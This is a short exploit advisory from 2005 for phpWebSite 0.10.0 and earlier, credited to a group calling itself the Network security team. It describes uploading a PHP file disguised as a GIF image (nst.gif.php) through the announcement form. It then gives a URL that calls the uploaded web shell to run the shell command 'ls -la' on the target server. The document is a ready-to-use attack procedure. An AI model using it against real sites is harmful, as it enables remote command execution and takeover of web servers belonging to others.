phpWebSite-0.10.0_exploit
Attachment:
nst.gif.php
Description: Binary data
oooo...oooo.oooooooo8.ooooooooooo .8888o..88.888........88..888..88 .88.888o88..888oooooo.....888 .88...8888.........888....888 o88o....88.o88oooo888....o888o ******************************** **** Network security team ***** ********* nst.e-nex.com ******** ******************************** * Title: phpWebSite <= v0.10.0 * Bug found by: nst * Date: 24.02.2005 ******************************** Web: phpwebsite.appstate.edu http://target/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3 1. Fill all inputs 2. in Image: select nst.gif.php press Save. Go here http://target/images/announce/nst.gif.php?nst=ls -la